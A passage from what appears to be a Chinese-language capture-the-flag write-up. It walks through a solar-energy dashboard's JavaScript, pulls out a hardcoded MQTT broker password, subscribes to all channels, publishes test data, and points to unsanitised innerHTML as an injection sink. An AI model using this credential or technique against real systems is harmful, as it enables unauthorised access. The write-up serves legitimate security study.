chart using Chart.js\n        const ctx = document.getElementById('energyChart').getContext('2d');\n        let energyChart = new Chart(ctx, {\n            type: 'bar',\n            data: {\n                labels: ['Solar', 'Consumed', 'Grid'],\n                datasets: [{\n                    label: 'Energy (kWh)',\n                    data: [solar, consumed, grid],\n                    backgroundColor: ['#6fcf97', '#eb5757', '#56ccf2'],\n                }]\n            },\n            options: {\n                scales: {\n                    y: {\n                        beginAtZero: true,\n                        ticks: {\n                            callback: function (value) { return value + " kWh"; }\n                        }\n                    }\n                },\n                plugins: {\n                    legend: {\n                        display: false\n                    },\n                    tooltip: {\n                        callbacks: {\n                            label: function (context) {\n                                return context.dataset.label + ': ' + context.raw + ' kWh';\n                            }\n                        }\n                    }\n                }\n            }\n        });\n\n        \/\/ Update the chart and labels with new data\n        function setParams(solarEnergy, consumedEnergy) {\n            let gridEnergy = consumedEnergy - solarEnergy;\n            solar = solarEnergy;\n            consumed = consumedEnergy;\n            grid = gridEnergy;\n\n            \/\/ Update the bar chart\n            energyChart.data.datasets[0].data = [solar, consumed, grid];\n            energyChart.update();\n\n            \/\/ Update labels with specific colors\n            document.getElementById('solarEnergyLabel').innerHTML = `<span class="energy-value solar">${solarEnergy} kWh<\/span>`;\n            document.getElementById('consumedEnergyLabel').innerHTML = `<span class="energy-value consumed">${consumedEnergy} kWh<\/span>`;\n\n            let gridLabel = document.getElementById('gridEnergyLabel');\n            gridLabel.innerHTML = `<span class="energy-value ${gridEnergy < 0 ? 'grid-negative' : 'grid-positive'}">${gridEnergy} kWh<\/span>`;\n\n            document.getElementById('userInfo').innerHTML = `<span>${userName}<\/span><br>${userRole}`;\n        }\n\n        setParams(0, 0);\n\n    <\/script>\n<\/body>\n\n<\/html><\/code><\/pre>\n
\u6ce8\u610f\u5230\u786c\u7f16\u7801\u7684MQTT \u51ed\u636e<\/strong><\/p>\n
var mqttclient = mqtt.connect('wss:\/\/www.solar.nyx\/wss\/', {\n            clientId: userName + '-dashboard-' + new Date().valueOf(),\n            username: 'user',\n            password: '1tEa15klQpTx9Oub6ENG',\n            protocolId: 'MQTT'\n        });<\/code><\/pre>\n
\u8ddf\u7740\u4f5c\u8005\u8d70\uff0c\u4e0b\u8f7d\u4e00\u4e2aMQTT\u5ba2\u6237\u7aefapp<\/a>\u8fdb\u884c\u4f7f\u7528\uff1a<\/p>\n
\"image-20260102141706281\"<\/div><\/p>\n
\u53d1\u73b0\u53f3\u4e0a\u89d2\u4e00\u76f4\u5728\u5f39\u51fa\u91cd\u8fde\u4e2d\uff0c\u5173\u6389\u81ea\u52a8\u91cd\u8fde\u5373\u53ef\uff1a<\/p>\n
\"image-20260102141115170\"<\/div><\/p>\n
\u7136\u540e\u5c31\u8fde\u4e0a\u4e86\uff0c\u63a5\u53d7\u5168\u90e8\u9891\u9053\u7684\u4fe1\u606f\uff1a<\/p>\n
\"image-20260102141855913\"<\/div>
\n
\"image-20260102141911402\"<\/div><\/p>\n
\u5c1d\u8bd5\u53d1\u5e03\u6570\u636e\uff0c\u770b\u770b\u662f\u5426\u4f1a\u53cd\u6620\u5230\u524d\u7aef\u754c\u9762\uff1a<\/p>\n
{"solarEnergy":11111,"consumedEnergy":22222}<\/code><\/pre>\n
\"image-20260102142402866\"<\/div><\/p>\n
\u89c2\u5bdf\u6e90\u4ee3\u7801\uff1a<\/p>\n
\/\/ Update labels with specific colors\ndocument.getElementById('solarEnergyLabel').innerHTML = `<span class="energy-value solar">${solarEnergy} kWh<\/span>`;\ndocument.getElementById('consumedEnergyLabel').innerHTML = `<span class="energy-value consumed">${consumedEnergy} kWh<\/span>`;<\/code><\/pre>\n